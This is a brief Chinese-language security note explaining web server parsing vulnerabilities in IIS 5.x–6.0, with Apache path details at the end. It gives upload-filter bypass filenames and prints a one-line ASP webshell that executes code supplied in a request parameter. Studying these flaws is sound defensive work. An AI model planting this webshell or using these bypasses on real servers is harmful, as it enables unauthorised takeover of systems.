解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。
0x01 IIS
1.IIS 5.X-6.0解析漏洞:
-
存在以".asp"格式结尾的文件夹,里面的任意文件都可以当作asp脚本执行:
http://127.0.0.1/.asp/1.txt
==http://127.0.0.1/.asp/1.asp
其它文件格式解析:".asa .cer .aspx " -
文件含 ; 号,后面的内容会被截断:
http://127.0.0.1/1.asp;.jpg
==http://127.0.0.1/1.asp
asp一句话: <%execute(request("value"))%>
2.IIS7.0/7.5畸形文件解析:同nginx
0x02 Apache
默认web目录:/var/www/html
配置文件目录:/etc/httpd/conf/httpd.conf